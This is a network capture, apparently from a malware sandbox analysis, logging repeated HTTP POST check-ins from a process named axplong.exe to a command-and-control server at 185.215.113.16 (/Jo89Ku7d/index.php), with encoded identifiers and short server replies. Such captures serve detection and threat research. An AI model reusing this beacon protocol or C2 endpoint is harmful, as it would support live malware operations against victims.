Aug 19, 2024 06:05:59.017360926 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	49852	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:59.025968075 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:05:59.796633005 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:05:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49854	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:59.910567045 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49855	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:05:59.924645901 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:00.703411102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	49857	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:00.828200102 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	49858	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:00.842861891 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:01.614602089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49860	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:01.736391068 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:02.488652945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	49861	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:02.497602940 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	49862	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:02.625613928 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:03.398099899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	49863	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:03.500884056 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:04.286824942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	49864	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:04.407325983 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:05.165461063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	49866	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:05.203308105 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:05.998055935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	49868	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:06.142715931 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:06.894865036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	49869	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:06.904792070 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:07.700699091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	49871	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:07.814739943 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:08.570414066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	49873	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:08.581038952 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:09.344243050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	49874	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:09.470076084 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:10.239201069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	49876	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:10.248833895 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:11.011564016 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	49877	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:11.135107040 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:11.913244963 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	49879	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:11.995177984 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:12.757488966 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	49880	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:12.876069069 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:13.645611048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	49882	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:13.654280901 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:14.437005997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	49883	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:14.821037054 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 19, 2024 06:06:15.566977978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	49885	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:15.577450037 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 46 41 36 34 30 43 39 46 32 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FFA640C9F2FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Aug 19, 2024 06:06:16.330902100 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 19 Aug 2024 04:06:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	49886	185.215.113.16	80	7264	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 19, 2024 06:06:16.453877926 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
